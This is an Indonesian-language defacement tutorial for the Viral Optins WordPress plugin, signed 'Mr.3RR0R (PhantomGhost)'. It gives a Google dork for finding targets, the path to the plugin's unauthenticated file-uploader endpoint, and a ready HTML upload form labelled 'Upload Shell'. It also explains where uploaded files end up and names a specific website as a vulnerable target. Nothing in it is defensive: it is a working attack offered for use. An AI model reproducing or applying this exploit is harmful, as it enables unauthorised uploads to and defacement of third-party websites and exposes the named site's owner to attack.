Hallo!!!!!!! , Berjumpa Lagi Sama Mr.3RR0R :v
Gmana Kabarnya.? , Pasti Lagi Online , Sambil Duduk :D
Klau Gitu Saya Lagi Berbagi "Tutorial Deface Dengan Viral_Optins v2"
Langsung Aja Ke Tempat Pembelajaran
- Dork : "inurl:/wp-content/plugins/viral-optins/" ( tanpa tanda " )
Exploit : http://target/wp-content/plugins/viral-optins/api/uploader/file-uploader.php
CSRF :
<font color="red">
<h1 align="center">Upload Shell</h1></font>
<br>
<body background="black"><style>body {background:black}
input,submit {border:1px;solid green;color:green}</style><center>
<form method="POST" action="target" enctype="multipart/form-data" > <input type="file" name="Filedata"></center><br>
<input type="submit" name="Submit" value="Upload">
</form></body>
Langsung Aja Pergi Ke Google.com , Terus Gunakan Dorknya
terus Cari Target , Klau dapat masukin Exploit Yang Ada Diatas.
Kalau Vuln Nanti Tuh Tidak Ada tulisan (Blank) .
Upload Deh file yg Berextensi .jpg .png .txt dll (html atau php nggak bisa :v)
Akses file : http://target/wp-content/uploads/(tahun)/(bulan)/file
Vuln Target :"http://ailisgarcia.com/wp-content/plugins/viral-optins/api/uploader/file-
uploader.php"
Vuln Target :"http://ailisgarcia.com/wp-content/plugins/viral-optins/api/uploader/file-
uploader.php"
Exploit Author : Mr.3RR0R (PhantomGhost)
My Facebook : https://www.facebook.com/marselERROR
Forum : phantom-ghost.org
Fanspage : https://www.facebook.com/PG.phtml/